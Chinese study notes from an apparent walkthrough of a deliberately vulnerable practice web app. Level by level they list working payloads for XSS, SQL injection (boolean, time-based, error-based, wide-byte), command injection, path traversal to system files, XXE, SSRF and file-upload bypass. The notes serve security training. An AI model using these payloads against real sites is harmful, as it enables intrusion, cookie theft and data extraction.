一 暴力破解
第一个直接用暴力破解
第二个验证码不会过期
暴力破解时输入正确验证码就可以了
第三个是前端验证码,根本没用,直接暴力破解
二 XSS
形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害
一 反射型xss
1 get型(一次性危害)
<script>alert('xss')</script>
2 post型
二 存储型XSS
<script>alert('xss')</script>
与反射型XSS形成原因相同
但是会存储在后台,造成持续性危害
三 DOM型XSS
1 dom型xss
输入#'οnclick="alert(666)">
代码形成闭合
2 dom型xss_s
这个和XSS区别是这个类型的输入通过浏览器url获取
在url中可以显示
四 XSS盲打
对攻击者来说,就是一种尝试因为前端无法看到
可能会在后台生效
<script>alert('xss')</script>
五 XSS过滤
不同的过滤方式有不同的漏洞
这里就对小写script做了屏蔽
直接换成大写就行了
<SCRIPT>alert('xss')</SCRIPT>
六 xss之htmlspecialchars
这个函数将字符转换成HTML实体
但是默认函数没有对单引号处理
q'οnclick='alert(666)'
七 xss之href输出
href 属性的值可以是任何有效文档的相对或绝对 URL,包括片段标识符和 JavaScript 代码段。如果用户选择了<a>标签中的内容,那么浏览器会尝试检索并显示 href 属性指定的 URL 所表示的文档,或者执行 JavaScript 表达式、方法和函数的列表。
从上述描述可见,这边可以利用JavaScript协议。
javascript:alert(document.cookie)
八 XSS之js输出
查看源码,先闭合,再插入
x'</script><script>alert('xss')</script>
三 CSRF
一 get型url
发送的请求都会在URl中显示只需要修改URL就行了
二 post型url
抓包后改包再修改路径,如果点击,信息就会更改
三 CSRF Token
这种情况就是有token
将response的token替换request的token
四 SQL注入漏洞
这是一个针对数据库的漏洞
一 数字型注入(post)
burp抓包 发送到repeater
修改ID为1 or 1=1(为payload)
二 字符型注入(get)
构成一个合法闭合
Lucy'or 1=1#
三 搜索型注入
猜想源码,闭合前后
%666%' or 1=1 #%
四 XX型注入
还是猜想源码,闭合前后
xx’) or 1=1 #%
<--学习union联合查询,information_scheam后
尝试爆库 爆表-->
五 insert、update、delect
基于报错的信息获取
六 http头注入
将url用repeater打开
修改user-agent的内容
为firefox' or updatexml(1,concat(0x7e,database()),0) or '
七 基于boolian的盲注
输入kobe' and ascii(substr(database(),1,1))>113#
这句话的意思是将数据库名称的第一个字母是什么做判断
无输出说明为假
继续尝试
kobe' and ascii(substr(database(),1,1))=112#
八 基于时间的盲注
输入判断语句
kobe' and if((substr(database(),1,1))='p',sleep(5),null)#
如果是就暂停五秒
如果不是就不暂停
九 宽字节注入
使单引号逃逸出来闭合了语句
先抓包
再发送到repeater
修改name为1%df'union select 1,2#
五 RCE漏洞
一 exec ping
ping 一个本地地址127.0.0.1
查询自己的网络配置127.0.0.1 & ipconfig
二 exec evel
eval(输入)也就是执行任何我们输入的数据
输入phpinfo(); 函数被执行了
六 File Inclusion
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件
一 本地文件包含漏洞
将文件名替换
../../../../Windows/System32/drivers/etc/hosts
暴露了所有配置文件
二 远程文件包含漏洞
url中把include()函数的完整参数给出来了。
所以这关其实除了使用远程文件包含,还可以使用本地文件包含绝对路径
七 不安全的文件下载
通过更改ai.png来做我想要做的事
改为
http://ip/pk/vul/unsafedownload/execdownload.php?filename=../../../../../../windows/win.ini
访问该地址,win.ini将被下载
我下载win.ini大败而归
因为我的电脑有防御
八 不安全的文件上传
一 客户端check
写一个PHP文件
后缀改为png
上传后抓包,将png改为php
二 MINE type验证原理和绕过
和上一个过关方式一样
三 unsafe getimagesize()
这个漏洞后端检测手段丰富,具有很强的过滤效果,无法直接上传php脚本文件
可以使用图片木马
九 越权
一 水平越权
直接改url
二 垂直越权
登录员工号去改url后下去添加用户
十 目录遍历漏洞
查看url
在这个目录创建一个新的php文件
尝试登陆
十一 敏感信息泄露
先看页面源代码
找到账号密码
登陆后的url和登陆前的url只差了一个find
在登陆前的url中插入find
登录成功
十二 PHP反序列化
输入他给的payload
payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>
十三 XXE漏洞
输入<?xml version = "1.0"?> <!DOCTYPE note [ <!ENTITY hacker "xxe"> ]> <name>&hacker;</name>
有回显
十四 URL重定向
url=i
可以改一下
如url=http://www.douyin.com
十五 SSRF
一 curl
直接把URL改为http://www.baidu.com
发现可以跳转到百度
二file_get_contents()
试试file:///c:/windows/win.ini
登录百度